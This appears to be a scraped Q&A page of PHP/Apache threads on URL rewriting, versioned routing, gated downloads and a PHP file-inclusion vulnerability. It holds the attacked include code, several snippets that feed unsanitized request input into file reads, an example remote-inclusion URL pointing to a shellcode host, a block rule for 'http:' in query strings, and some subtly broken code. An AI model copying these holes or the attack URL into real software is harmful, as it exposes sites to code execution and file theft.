what I'm trying to do is to handle multiple versions of the same web application, somewhat like Google does with some of their products where you get the "Try the new version" link.
The goal is to have both a "stable" and a "beta" version of the webapp and letting the users try out the new features without forcing them (and their bugs) on them.
Now, a very simple way of doing this would be to put each version in its own subfolder, like www.mywebapp.com/v1 and www.mywebapp.com/v2.
However, I would like this to be transparent to the user and the webapp URL to stay the same (e.g.: www.mywebapp.com/).
Which version must be loaded is determined server-side after the user logs in (e.g.: active version for the given user is stored in the DB) and may be later changed when the user clicks on the "try the new version"/"go back to the old version" links.
On the server side I must make do with MySQL, PHP and Apache.
I have already managed to get this working placing each version into its own subfolder, then storing version information in cookies (updated by the server at each login or page refresh) and using RewriteRule(s) to "proxy" requests from the base/versionless URL to the proper subfolder. If no cookie is set, a default folder is selected by a fallback RewriteRule.
This kludge works but feels extremely fragile and it puts additional burden on the Apache daemon so here I am asking if anybody knows a better way of doing this.
Thanks!
htaccess allows for rewrites based on the contents of cookies. Since Apache is AWESOME at redirects and PHP is adequate, I would handle it that way.
This example tests to see if there is a vers cookie. If there is, it adds 'vers=' + whatever was in the vers cookie to the request.
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_COOKIE} vers=([^;]+) [NC]
RewriteRule ^(.*)$ /$1?vers=%1 [NC,L,QSA]
(that example can be found here)
Use a single RewriteRule to reroute all requests to a single route.php file in the root folder of your website.
The route.php file should look like this:
$user = authenticateUser();
$version = $user->getPreferredVersion();
$filePath = $_SERVER['DOCUMENT_ROOT'].'v'.$version.$_SERVER['REQUEST_URI'];
if( !file_exists( $filePath ) ) {
header("Status: 404 Not Found", true, 404 );
die();
}
$pathDetails = pathinfo( $filePath );
if( $pathDetails['extension'] == 'php' ) {
require( $filePath );
} else {
if( $pathDetails['extension'] == 'jpg' ) {
header( 'Content-Type: image/jpeg' );
} elseif( $pathDetails['extension'] == 'gif' ) {
...
} elseif (...) {
...
} else {
// unsupported file type
header("Status: 404 Not Found", true, 404 );
die();
}
echo file_get_contents( $filePath );
}
This is the outline of what you should do in route.php there are some other security and technical issues that you should take care of in that file.
I think a better way in PHP would be to simply query the database, get the desired version, and then include() it from a subfolder. That way it's transparent to the user.
For instance, assuming the user has opted in for the new beta, you save his entry in the database,
UPDATE `versions_table` SET (`version`) VALUES ('1.02b') WHERE `userid` = 5
And then when he accesses the page, you have something like this going on:
//PDO Connection here, skipped for example purposes
$stmt = $pdo->query('SELECT `version` from `versions_table` WHERE `userid` = 5 LIMIT 1');
//Of course 5 is only an example, in actual code that would be a variable
//representing the actual user ID.
$row = $stmt->fetch(); //Should be only one row.
include_once($row['version'].'/myApp'.'.php'); //Include 1.02b/myApp.php
While it is possible to use a routing mechanism and session information to make rules, I would rather keep your current solution. All you'd do by implementing it in PHP is that you push the load from the apache2 (which already has a very fast Rewrite-Engine) to the php-binary. Also, you would put your application at risk of interfering versions due to incompatibilities of data, cookies and other session-based variables.
On the other hand, you have the benefit of reusability of shared objects like libraries, Domain Models, Data Mappers, etc. But in my opinion that advantage doesn't weight up the worse performance and interference risk.
So in one phrase, I believe your current solution is best.
Load your version-ed page/wepages in IFRAME and IFRAME src could be "webapp.com/v2"..
So whichever version user selects your address bar will read webapp.com..but your IFRAME url keeps on changing depending on version..
There is no need to write rewrite rules..
This might help: what I am using for a month now is
Keep all the files in database (path, code, version=Decimal(3,1), flag:stable=3/lab=2/beta=1/alpha=0)
have .htaccess redirects all non existing files (don't redirect images, css, js or other static non version-ate files) internally to loader.pm (for you loader.ph_) don't use same extension as your other files for differentiation
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ loader.pm [L,QSA]
loader loads the latest stable version from database or beta version if no stable version exists.
SELECT code, version, flag FROM table WHERE path = ? AND flag > 0 ORDER BY flag DESC, version DESC LIMIT 1 Don't show alpha pages that are under development
output 404 error if no results, and
when version is specified like ?v=2.0 loader file uses different query
SELECT code, version, flag FROM table WHERE path = ? AND version <= ? ORDER BY flag DESC LIMIT 1
Assumptions:
A user either want stable or latest; so you actually don't need more than 2 files per path; until unless you want to keep old versions for showcase. If user want latest, use .. ORDER BY version DESC, flag DESC, ..
User doesn't care to know which version it is, hence instead of setting same version for whole website at once, we set version of each file individually; so tracking development is easy.
Problems:
No index/primary key
You need to make sure that you don't have duplicate entries, it will not break your website though, but it will not look good ;)
if same beta & stable version exists for a file, and user has opted for latest (beta); then you might accidentally deliver him beta file instead of stable file.
query-string variable ?v= is reserved for selecting versions, but that is fine; you may choose ?var=
There is a cloud platform that does this automatically upon deployment. www.cycligent.com
It is just a matter of setting a cookie once the two versions are deployed. A lot less work than some of the other answers shown.
Full Disclosure: I work for Cycligent.
Related
I have a web site which currently has over 900 html articles currently viewable to anyone. I want to change it to restrict viewing of certain articles by membership only. I have the articles in sql database with flag if restricted. There is an article index with links to each article. The process will be to check if article is restricted, check if user is member logged in, then display, otherwise send to login or subscribe pages. Since there is so many articles, I can't just add some php to not display if the article is accessed directly. My question is where in my web directory to I put these article pages, and how do you protect someone from directly accessing the page, but allow access once the user is authenticated? Any input is appreciated. Anyone know of good reference books on this either?
Move the files so that they're above your document root, and therefore inaccessible through the web server. Or, move the files to a directory which you protect with a password (.htaccess/.htpasswd pair). You never give out that password, it's only there to prevent direct access of the files.
Then, write a script which proxies the articles. That script checks if the user is logged in. If not, it redirects them to the login page. If it is, it reads the article HTML from its actual location, and sends it through.
Ex: http://www.example.com/article.php?view=cooking.html
session_start();
if (!isset($_SESSION['logged_in'])) {
header("Location: login.php");
} else {
readfile("/path/to/articles/" . $_GET['view']);
}
You'll want to do some kind of sanitation on $_GET['view'] to make sure it doesn't contain anything but the name of an article.
You can even keep your current URLs and links to the articles by rewriting them to the proxy script in your .httaccess/httpd.conf with mod_rewrite. Something like this:
RewriteEngine On
RewriteRule article/(.*)\.html articles.php?view=$1 [L]
If you don't already have any existing framework for PHP development that would help with security matters, you might consider something simpler than even using PHP to restrict access. Read up about .htaccess files, and how you can create a protected directory in which you could place all the restricted articles. Then you can setup user account and require people to authenticate themselves before they can read the restricted articles.
Here's a tutorial on how to setup .htaccess for user authorization/authentication:
http://www.javascriptkit.com/howto/htaccess3.shtml
You have a couple of basic options:
Add the code to each page. You can probably automate this, so its not as bad as it sounds. It really shouldn't be more than a single include.
Figure out how to get your web server software (e.g., apache) to do the authentication checks. Depending on how complicated your checks are, a mod_rewrite external mapping program may be able to do it. Other than that, there are existing authentication modules, or writing a fairly simple shim isn't that hard (if you know C)
Feed all page loads through PHP. This will probably break existing URLs, unfortunately. You pass the page you want to see as a parameter or part of the path (depending on server config), then do you checks inside your script, and finally send the page if the checks pass.
The simplest way would probably be to move all the aricle files outside the web root, and then use PHP to fetch them if the client is allowed to see it.
For example:
<?php
if (isset($_GET['id']))
{
$articleDir = "/var/articles/";
// Assuming a "?id=1" query string is used to pass a numberic ID of
// an article. (Like: example.com/showArticle.php?id=1)
$articleID = (int)$_GET['id'];
$articleFile = "article_{$articleID}.html";
// Look through your SQL database to see if the article is restricted.
// I'll leave the codeing to that up to you though.
if (!$isRestricted || $isLoggedIn)
{
$path = $articleDir . $articleFile;
if (file_exists($path))
{
include $path;
}
else
{
echo "The requested article does not exist.";
}
}
else
{
echo "You have to be logged in to see this article.";
}
}
else
{
echo "No article ID was passed. Did you perhaps follow a bad link?";
}
?>
Note that if you want to keep the old links alive, you can use Apache's mod_rewrite to rewrite incoming requests and route them to your PHP file.
Edit
This may help if you are new to mod_rewrite and/or regular expressions:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^article_(\d+)\.html$ fetchArticle.php?id=$1 [L]
</IfModule>
Routs any link such as example.com/article_123.html to example.com/fetchArticle.php?id=123 without the client noticing it.
Similar to what Dan Grossman did, but this one fetches only numbers.
I want to create a link like the following:
http://www.myurl.com/?IDHERE
What i want to be able to do is be able to goto the above link, and then pull whats after the ? (in this case IDHERE) and be able to use that information to perform a MySQL lookup and return a page.
Can anyone point me into the right direction? please know this is using PHP not ASP
The issue here is not with your scripting language, but with your web server setup. I'll refer to these by their Apache names, but the features should be available in most web servers.
There are three features you might want to use:
1) content negotiation (mod_negotiation), which allows your web server to try a specified list of extensions in a specified order, for example: http://example.com/foo might be http://www.example.com/foo.html or http://example.com/foo.php
2) DirectoryIndex, which tells the web server that when a client asks for http://example.com it should look for a specified list of files in order, so it might server up http://example.com/index.html or http:/example.com/index.php
3) mod_rewrite, which allows you to basically rewrite the URL format received by the server. This allows you to do things like translate http://example.com/foo/bar/baz to http://example.com/foo/bar.php?page=baz
The rest is done by the backend script code as normal.
Create a default PHP file in that directory that will get loaded when no file name is specified (e.g. index.php). In your PHP script you can get the part after the question mark from the variable $_SERVER['QUERY_STRING'].
Do the following in your site's main index.php:
list($id) = array_keys($_GET);
// right now, $id represents the ID you're looking for.
// Do whatever you want with it.
In the link, form or whatever - index.php?id=someid
In your index.php file:
$_GET['id'] = $id
Now you can use it:
e.g.
echo $id;
Since it's your default page, it will work without the extension.
list($id) = array_keys($_GET);
// right now, $id represents the ID you're looking for.
// Do whatever you want with it.
this was exactly what i was looking for, though now i just need to create something to notify if nothing is there or not. Thank you all for your responses.
I would solve it by using .htaccess file if possible.
create a .htaccess file in the main directory with the content:
RewriteEngine on
RewriteRule cat/(.*)/(.*)/(.*)/$ /$1/$2.php?$3
that should translate "example.com/foo/bar/baz" to "example.com/foo/bar.php?page=baz"
What I want to ask is if there is a way to find out if a web-server instance has URL Rewriting enabled. I need this in order to be able to instantiate the correct type of URL handler.
Theoretically you know in advance if you have it enabled or not and can use something to configure it. I would like, however, to be able to detect this setting automatically at runtime.
The URL rewrite rule would be something very simple like:
^/(.*)$ => /bootstrap.php
This guarantees that the relevant string is present in the REQUEST_URI, but doesn't pollute the _GET array.
Where did my research took me so far:
Apache.
In my opinion Apache has a very quirky approach, since it sets the REDIRECT_SCRIPT_URI header for rewrote URLs, but not for the ones that are not rewrote.
E.g. http://host/ana/are/mere would be re-wrote to index.php so the aforementioned header would be present, but http://host/ wouldn't be re-wrote.
Lighttpd.
Lighttpd with fast-cgi behaves OK, setting the REDIRECT_URI header if URL Rewrite is enabled for the current host. This is reliable.
Cherokee.
Well, for Cherokee there is no method that I found out, as it uses (in my opinion) a more complicated method for obtaining URL rewriting. (I.e., it's called internal redirect – and the fcgi process doesn't know that the request was redirected)
Also I haven't tested other http servers, as nginx, so if someone has some input on this matter I would love to hear it.
Not the most elegant solution, but you could create a directory, insert a .htaccess and a small php file and try to open it with curl/file_get_contents() from your actual code:
.htaccess
RewriteEngine on
RewriteRule ^(.*?)$ index.php?myparam=$1
index.php
<?php
//open with file_get_contents("http://yoursite/directory/test")
if($_GET['myparam']){die("active");}
?>
Although this might be acceptable during an installation, for performance reasons this shouldn't be used for every request on your site! Save the information somewhere (sqlite/textfile).
Update
Apache specific, but apache_get_modules()/phpinfo() in combination with array_search/strpos is maybe helpful to you.
It's already touched upon below, but I believe the following recipe is a rather waterproof solution to this problem:
Set up the redirection
Request a page through its rewritten url
If the request returns the page in question, you have redirection set up correctly, if you get HTTP 404 response, then it's not working.
The idea is basically that this works with just about any redirection method. It has already been mentioned, but bears reiterating, such tricks add quite a bit of overhead and are better performed only once (installation or from the settings panel) and then saved in the settings.
Some implementation details, choices to make and a little on how I came to this solution:
I remembered Drupal did such a check during the installing process, so I looked up how they did it. They had the javascript on the install page do an ajax request (synchronously, to prevent concurrency issues with the database). This requires the user installing the software to have javascript turned on, but I don't think that's an unreasonable requirement.
However, I do think using php to request the page might be a cleaner solution. Alongside not bothering with a javascript requirement, it also needs less data to be sent back and forth and just doesn't require the logic of the action to be spread over multiple files. I don't know if there are other (dis)advantage for either method, but this should get you going and let you explore the alternative choices yourself.
There is another choice to be made: whether to test in a test environment or on the normal site. The thing Drupal does is just have the redirection always turned on (such as in the apache case, have the .htaccess file that does redirects just be part of the Drupal download) but only write the fancy urls if the redirection is turned on in the settings. This has the disadvantage that it takes more work to detect which type of redirection is used, but it's still possible (you can for example add a GET variable showing the redirection engine either on a specific test page or even on every page, or you can redirect to a page that sets $redirectionEngine and then includes the real index). Though I don't have much experience with redirection other than with mod_rewrite on apache, I believe this should work with just about every redirection engine.
The other option here is to use a test environment. Basically the idea is to either create a folder and set up redirection for it, or remove the need for file system write access and instead have a folder (or a folder for each redirection engine). This has some disadvantages: you still need write access to set up the redirection for the main site (though maybe not for all redirection engine, I don't really know how you all set them up properly - but for apache you will need write access if you are going to turn on redirection), it might be easier for a bot to detect what software and what version of it you are using through accessing the tests (unless you remove the test folders after testing) and you need to be able to rewrite for only a part of the site (which makes sense for any redirection engine to be a possibility, but I'm not blindly going to assume this functionality). However, this does come with the advantage of it being easier to find out which rewrite engine is being used or basically any other aspect of the redirection. There might also be other advantages I don't know of, so I just give the options and let you pick your method yourself.
With some options left to the user, I believe this should help you set up the system in the manner that you like.
PHP has server-specific functions for Apache, IIS and NSAPI servers. I only have Apache but as merkuro suggested this works as expected:
<?php
if (in_array('mod_rewrite',#apache_get_modules()))
echo 'mod_rewrite enabled';
else
echo 'mod_rewrite not enabled';
?>
As PHP server-specific functions don't cover all the servers you'd like to test in this probably isn't the best solution.
I'd recommend merkuro's first answer - implementing then testing it in script. I believe it's the only way to get a good result.
Hope that helps!
You can programmatically check for the existence of mod_rewrite if the server is Apache by using the apache_get_modules() function in PHP:
$modules = apache_get_modules();
echo in_array('mod_rewrite', $modules) ? 'mod_rewrite detected' : 'mod_rewrite not detected';
This could be used as the first step, but it is not a full proof method by any means. Just because mod_rewrite is loaded does not mean it is available for your environment. This also doesn't help if you are on a server that is not Apache.
There are not many consistent methods that will work across all platform combinations. But since the result is consistent, you can test for that. Setup a special redirect, and have a script use PHP's cURL or file_get_contents() to check a test URL. If the redirect was successful, you will get the expected content, and you can test easily for this.
This is a basic .htaccess I setup to redirect ajax to ajax.php:
RewriteEngine On
RewriteRule ajax ajax.php [L]
The following PHP script will attempt to get the contents of ajax. The real script name is ajax.php. If the redirect fails, then it will not get the expected contents.
error_reporting(E_ALL | E_STRICT);
$url = 'http://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['REQUEST_URI']).'/ajax';
$result = json_decode(#file_get_contents($url));
echo ($result === "foobar") ? 'mod_rewrite test was successful' : 'mod_rewrite test failed';
Lastly, here is the final piece of the script, ajax.php. This returns an the expected response when the redirect is successful:
echo json_encode('foobar');
I have setup a live example of this test, and I have also made available the full sources.
As all the awnser already mention, actually testing it is the only way to be sure it works. But instead of actually redirecting to an actual page and waiting for it to load, I would just check the header.
In my opinion this is quickly enough to be even used at runtime at a regular site. If it realy needs to be high performance, then ofcourse caching it is better.
Just put something like the following in your .htaccess file
RewriteEngine on
RewriteRule ^/redir/My/Super/Special/Hidden/Url/To/Test/$ /redir/longload.php [L,R=307]
And then you can use the following php code to check if mod_rewrite is enabled.
<?php
function HasModRewrite() {
$s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : "";
$sp = strtolower($_SERVER["SERVER_PROTOCOL"]);
$protocol = substr($sp, 0, strpos($sp, "/")) . $s;
$port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
$options['http'] = array(
'method' => "HEAD",
'follow_location' => 0,
'ignore_errors' => 1,
'timeout' => 0.2
);
$context = stream_context_create($options);
$body = file_get_contents($protocol . "://" . $_SERVER['SERVER_NAME'] . $port .'/redir/My/Super/Special/Hidden/Url/To/Test/', NULL, $context);
if (!empty($http_response_header))
{
return substr_count($http_response_header[0], ' 307')>0;
}
return false;
}
$st = microtime();
$x = HasModRewrite();
$t = microtime()-$st;
echo 'Loaded in: '.$t.'<hr>';
var_dump($x);
?>
output:
Loaded in: 0.002657
---------------------
bool(true)
Hi I am trying to redirect all links to any pdf file in my site to a page with a form in it that collects user info before they can proceed to download/view the pdf.
Eg
I want to redirect *.pdf files in web site to request.php?file=name_of_pdf_being_redirected
Where request.php is the page with the form on it asking for a few details before proceeding.
All pdf's in the site are held inside /pdf folder.
Any ideas?
EDIT: sorry I'm using Apache on the server.
OK I'M GETTING THERE:
I have it working now using:
RewriteEngine on
RewriteRule ^pdf/(.+.pdf)$ request.php?file=/$1 [R]
But now when it goes to the download page when i want to let the person actually download the file my new rule is spitting the download link back to the form :-P haha so is there anyway to let it download the file once the form has been submitted and you're on download.php?
Ideas? You could start by telling us which web/app server you're using, that might help :-)
In Apache, you should be able to use a RewriteRule to morph the request into a different form. For example, turning /pub/docs/x.pdf into request.php?file=/pub/docs/x.pdf could be done with something like:
RewriteRule ^/pdf/(.*)\.pdf/ request.php?file=/$1.pdf
Keep in mind this is from memory (six years since I touched Apache and still clean :-), the format may be slightly different.
Update:
Now you've got that sorted, here's a couple of options for your next problem.
1/ Rename the PDFs to have a different extension so that they're not caught by the rewrite rule. They should be configured to push out the same MIME type to the client so that they open in the clients choice of viewer.
2/ Do the download as part of the script as well, not as a direct access to the PDF. Since the submission of the form is a HTTP request, you should be able to answer it immediately with the PDF contents rather than re-directing them again to the download page.
That second option would be my choice since it:
stops people figuring out they can get to the PDFs just by requesting xx.pdfx instead of xx.pdf.
makes it quicker for the person to get the PDF (they don't have to click on the link again).
You can try this:
Move your files to a folder "outside" your web root so that no one can access it thru a browser
Use sessions to detect whether a person has completed the form or not
Use a php powered file download script. In its naivest form, it might look like this:
if ( isset( $_SESSION[ 'OK_TO_DOWNLOAD' ] ) == false )
{
header( "Location: must_fill_this_first.php" );
exit( 0 );
}
header( "Content-type: application/pdf" );
// double check the above, google it as i am not sure
echo file_get_contents( 'some_directory_inaccessible_thru_www/' . $_GET[ 'pdf_name' ] );
// ideally a binary-safe function needs to be used above
This is a tried and tested technique I used on a website. The code example is a draft outline and needs refinement.
Note, my answer is with respect to a .NET website, but I'm sure the same constructs exist somewhere in PHP.
I would have an HTTPModule with a path of *.pdf that simply does a Response.Redirect to request.php?...etc (in my case request.aspx) And then in the event handler for the button click on that page, when you know which pdf to display and that they're authorized, simple do a Response.ContentType = [MIME type of pdf], and then Response.WriteFile(pdfFile), and finally Response.End().
There are other things you can add to make it better, such as filesize, etc. But in the minimal case, this would work. If you want the code for it in C# I could come up with something in about 3 minutes, but in PHP i'm quite lost. I'd start out looking for HTTPModules and how to write them in PHP.
Googling for "PHP HTTPModule" leads to this: Equivalent of ASP.NET HttpModules in PHP so, I may be a little wrong, but hopefully that's a starting point.
Use an .htaccess file if you're using an Apache web server. You'll need to make certain that you have mod_rewrite enabled, but once you do you can rewrite all files using these two simple lines:
RewriteEngine On
RewriteRule ^.pdf$ /rewrite.php [NC,L]
If you are using IIS, you can accomplish something similar using ISAPI_Rewrite.
Your other alternative is to place your pdf's inside of a directory that is not publicly accessible and then any request made for a pdf resource would return an access denied error and the files could only be accessed through the appropriate download script.
if($user==authenticated){
//set pdf headers
echo file_get_contents('actual.pdf');
no mod re-writes, hides actual source and is what i normally do - hope this helps
My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if ( isset( $ _GET['page'] ) ) {
include( $ _GET['page'] . ".php" );
} else {
include("home.php");
}
?>
There where no SQL calls, so I wasn't afraid for SQL Injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
include($_GET['page'].'.php');
} else {
include('home.php');
}
Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However don't use a blacklist for bad characters, but a whitelist for allowed characters:
$page = preg_replace('[^a-zA-Z0-9]', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could execute "h.o.m.e" and it would give the "home" page, because all it does is removing all prohibited characters. It's not intended to stop "smartasses" who want to cute stuff with your page, but it will stop people doing really bad things.
BTW: Another thing you could do in you .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /–http– [F,NC]
RewriteRule http: /–http– [F,NC]
That way all page accesses with "http:" url (and query string) result in an "Forbidden" error message, not even reaching the php script. That results in less server load.
However keep in mind that no "http" is allowed in the query string. You website might MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read german: I also have a blog post on that topic.
The #1 rule when accepting user input is always sanitize it. Here, you're not sanitizing your page GET variable before you're passing it into include. You should perform a basic check to see if the file exists on your server before you include it.
Pek, there are many things to worry about an addition to sql injection, or even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
$page = urldecode($_GET['page']);
$page = basename($page);
$file = dirname(__FILE__) . "/{$page}.php";
if (!file_exists($file)) {
$file = dirname(__FILE__) . '/home.php';
}
} else {
$file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.
pek, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you should consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local windows network, HTTP and FTP, amongst others. Thus in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webbserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access to files, when using the file open functions. ini-set can be used to set and unset this value at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
I know this is a very old post and I expect you don't need an answer anymore, but I still miss a very important aspect imho and I like it to share for other people reading this post. In your code to include a file based on the value of a variable, you make a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice urls, which are very user and SEO friendly. Instead of a field value like 'page' you could make an URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a table from a database and will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
Always make sure you end with hardcoded filenames or an equivalent from the database (preferrabley a return value from a stored procedure), because it is asking for trouble when you make use of the information from the request to build the response.
Because your URLs are independent of the delivery from the back end you will never have to rewrite your URLs in the htAccess file for this kind of change.
The URLs represented to the user are user friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines are in search of relevant content and when your URL is in line with the content will it get a better rate. At least a better rate then when your content is definitely not in line with your content.
If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrustfull source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check if the returned URL conforms your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ',",<,>,-,&,; etc..).
#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
'home',
'page',
);
if(in_array($_GET['page'], $whitelist)) {
include($_GET['page'] . '.php');
} else {
include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
Think of the URL is in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If the shellcode.txt runs SQL or PHP injection, then your website will be at risk, right? Do think of this, using a whitelist would be of help.
There is a way to filter all variables to avoid the hacking. You can use PHP IDS or OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate the suite, here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection, then all POST and GET variables will be filtered especially the one I mentioned, and if there are attacks found, it will report to you immediately/
Safety is always the priority